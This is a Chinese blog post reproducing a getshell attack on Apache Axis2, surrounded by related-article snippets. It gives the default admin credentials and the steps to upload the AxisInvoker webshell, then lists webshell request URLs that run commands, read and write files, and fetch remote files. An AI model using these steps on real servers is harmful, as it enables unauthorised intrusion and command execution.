Apache Axis2 后台文件上传getshell 漏洞复现

最新推荐文章于 2025-01-27 19:40:21 发布
原创 最新推荐文章于 2025-01-27 19:40:21 发布 · 2.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Apache Axis2 #axis2 #漏洞复现

0x00 前言

Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言JavaC的开发版本。

事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

0x01 漏洞复现

默认端口:8089

默认后台路径:/axis2-admin/login

默认账号密码:admin/axis2

选择Tools-“ Upload Service ”上传aar包 进行 getshell

成功后会提示“ File AxisInvoker.aar successfully uploaded  ”

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

0x02 使用方法

马子的使用方法:

支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
 
info-显示某些信息,根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

下载地址:https://github.com/CaledoniaProject/AxisInvoker

转载请注明:Adminxe's Blog » Apache Axis2 后台文件上传getshell 漏洞复现

 

axis2弱密码漏洞复现
信安是不可或缺的一部分!
12-30 5333
介绍 Axis2 Web 管理模块是一个下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。 环境介绍 主机
Java安全之Axis漏洞分析
m0_64354070的博客
11-29 2646
Java安全之Axis漏洞分析 0x00 前言 看到个别代码常出现里面有一些Axis组件,没去仔细研究过该漏洞。研究记录一下。 0x01 漏洞复现 漏洞版本:axis=<1.4 Axis1.4 freemarker 下载Axis包1.4版本将Axis放到tomcat的webapp目录中。freemarker.jar放到Axis的 lib目录下。运行tomcat即可。 WEB-INF/web.xml中将该配置取消注释 <servlet-mapping> &l...
axis2组件漏洞问题
08-01
推荐版本1.7.5
利用Axis2默认口令安全漏洞可入侵WebService网站
weixin_33850015的博客
10-12 2177
利用Axis2默认口令安全漏洞可入侵WebService网站 近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。 乌云Axis2默认口令安全弱点利用案例: 航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过) 乐信通某服务器axis2服务...
利用Axis2默认口令安全漏洞入侵WebService网站
weixin_33736832的博客
02-14 3062
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。黑吧安全网Axis2默认口令安全弱点利用案例:航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)中国科学...
Apache Apisix网关系统历史漏洞复现分析_apache apisix 漏洞
2401_86436758的博客
09-07 1386
【创建路由】通过下面的命令,你将创建一个路由,把请求【部署 APISIX Dashboard】Apache APISIX Dashboard 是基于浏览器的可视化平台,用于监控、管理 Apache APISIX。。此处安装失败,原因不详,从 docker 日志看是由于错误无法连接 2379 的 etcd 服务。
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 2685
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
从渗透到红队(二)漏洞利用
最新发布
weixin_66146598的博客
01-27 1096
各大厂商的服务端或者硬件设备不可能做到每年都更新,所以之前存在的NDay漏洞,或者服务端口漏洞,都是可以尝试的。可以复现一些常见漏洞进行提高。简单整理了一些常见端口漏洞,以及WEB组件漏洞
【自制导航系统调试艺术】:问题定位与性能优化不传之秘
[【自制导航系统调试艺术】:问题定位与性能优化不传之秘](https://avatars.dzeninfra.ru/get-zen_doc/271828/pub_651d51ad93c2aa5ef850b3fb_651d51b1125e2c235eaf6c5c/scale_1200) # 摘要 本文全面介绍了自制导航...
Buildroot vs Yocto终极对比:项目选型必须考量的5个核心维度
![Buildroot vs Yocto终极对比:项目选型必须考量的5个核心维度]...
webservice相关axis2以及文件上传下载的jar
02-22
webservice相关axis2以及文件上传下载的jar,完成webservice的开发
Java axis 配置host_Apache Axis1 与 Axis2 WebService 的漏洞利用总结
weixin_30636329的博客
02-27 1913
作者:Longofo@知道创宇404实验室日期:2021年226日Apache Axis分为Axis1(一开始就是Axis,这里为了好区分叫Axis1)和Axis2Axis1是比较老的版本了,在Axis1官方文档说到,Apache Axis1现在已经很大程度被Apache Axis2Apache CXF和Metro取代,但是,Axis1仍与以下类型的项目相关:需要使用JAX-RPC的项目。该...
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现
热门推荐
qq_43697234的博客
07-21 1万+
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现 漏洞产生原因: Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务 影响范围:Axis <=1.4 且enableRemoteAdmin设置为True 环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tom
Axis2 弱口令 getshell 漏洞复现
qax
01-05 2607
Axis2 Axis2是下一代 Apache AxisAxis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中 默认后台:http://ip:p
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
m0_59598029的博客
01-24 4575
[图片](https://img-一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
WebService之Axis2 Log4j 2.x 漏洞升级教程
一个标题
01-12 2073
Axis2 Log4j 2.x 漏洞升级教程
Apache漏洞复现
人若有志,就不会在半坡停止。
10-13 1809
的路径穿越符,当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测实现目录遍历。复制路径进行访问,成功查看到phpinfo的信息,说明上传的文件被执行。
Axis搭建加漏洞RCE(含CVE-2019-0227)
GalaxySpaceX的博客
05-15 3825
Axis漏洞RCE,包含CVE-2019-0227
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值